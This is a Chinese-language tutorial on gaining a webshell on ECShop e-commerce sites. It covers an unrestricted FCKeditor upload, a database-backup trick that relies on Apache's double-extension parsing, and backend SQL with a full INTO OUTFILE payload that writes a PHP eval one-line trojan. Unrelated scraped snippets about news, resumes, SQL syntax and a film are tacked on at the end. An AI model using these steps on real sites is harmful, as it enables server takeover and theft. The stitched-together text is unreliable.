*** 一:龙儿心发明的,版本未定,估计都行。
进入后台-系统设置-Flash播放器管理
可以上传任意文件。
[includes/fckeditor /editor/filemanager/connectors/php/config.php文件对Media没有任何限制,直接Type=Media 上传你的webshell,访问路径为http://target/images/upload/Media/xxx.php]
*** 二:另外一种是利用ecshop后台的数据库备份功能
这里选择自定义备份,目的是使你备份出来的文件尽量的小,要是太大的话也很麻烦。
然后去前台留个言,内容是我们的一句话木马,接着在后台选择备份ecs_feedback这张表,就是存放留言的表,如图:
然后会显示备份成功。
但是ecshop备份的文件都强行会在你填的备份的名字后面加上.sql扩展名(元备份名我填的是l4yn3.php),如图。
这么做无非就是提高安全性,可是设计者忽略了一个问题,如果php是在apache下运行的,利用apache的文件解析漏洞这种方式形同虚设。
因为apache有个漏洞就是对文件名是1.php.sql这种形式,只要最后的文件扩展名是apache不能能解析的,他就会按照php文件来解析它,那在这里sql文件就是apache不能够解析的文件,那么他理所当然会把这个文件当作php文件来执行。
所以如果是apache+php的话,即使文件名变成了上面这样,也可以正常解析,你所需要做的就是点一下备份后的链接。
所以您看出来了,这种拿shell的方式是需要你的环境是apache+php的。而且还有个条件是GPC魔术转换不能开启,所以也很鸡肋。
*** 三:ecshop后台有一个功能是sql查询,如图:
其实感觉在一个管理系统的后台放这么个功能根本没用,有多少网站管理员有这么高的觉悟,会用这个?
不过也不错,便宜了我们小菜拿shell。
*** 就像phpmyadmin一样直接操作sql语句导出一句话木马拿shell。
语句如下:
show databases;
use 数据库名;
create a(cmd text not null);
insert into a(cmd) values('<?php eval($_POST[cmd]);?>');
select cmd from a into outfile '导出路径';
drop table if exists a;
很常规的语句。也许有人会问不知道网站路径怎么办,那要导出到哪呢?这里有一个技巧就是 use 数据库名; 这句话,其实在这个sql查询功能中默认用的数据库就是本网站的数据库,开发者设计的时候不会考虑你去use 其他的数据库,所以这里你用use 数据名库这句时,会产生一个警告,但并不影响sql的运行,却可以成功爆出网站的路径,多次测试均成功,如图:
银监会主席(银监会现任和历届主席)原创每日经济新闻2017-02-24 12:17:24 全国“两会”尚未正式开始,一位省长的行踪就被刷屏了。各路记者深夜从这位省长下车的高铁站,一路堵到了位于北京金...
给大家分享一篇文章《一份简历要怎么写才能吸引到人呢?》,文中介绍了13个写简历的要点,可以了解一下。...
SELECT * FROM SOME_TABLEWHERE SOME_COLUMN IS NULL 或者这样写: 复制代码 WHERE SOME_COLUMN = 1 正确的写法应该是第二种(WHE...
导读:可视化图表,图形和仪表中的数据是使数字可以或许实际对话的最强大的方法之一。可是,许多刚开始利用的人往往会不知所措,无法下手。本文作者具体解读了关于数据可视化图表设计如何循序渐进的进程,以便各人在...
为了更好地阻拦餐馆虚耗个人行为,规章确立了餐饮经营经营人、模块饭堂、餐馆网络直播平台等各种各样行为主体的法律依据。规章划分,餐饮经营经营人凭证顾客要求能够出示大份、少量组成等区别规格型号、区别份量...
爱情重伤(法国情人) 原创:广州和真心理 唐莺 影片描述了即将入职的内阁部长史蒂夫同妻子英格丽、儿子马丁平静地生活在一起,看上去幸福而圆满。当儿子的女朋友安娜出现时,一股汹涌的暗流开始冲撞着这个家...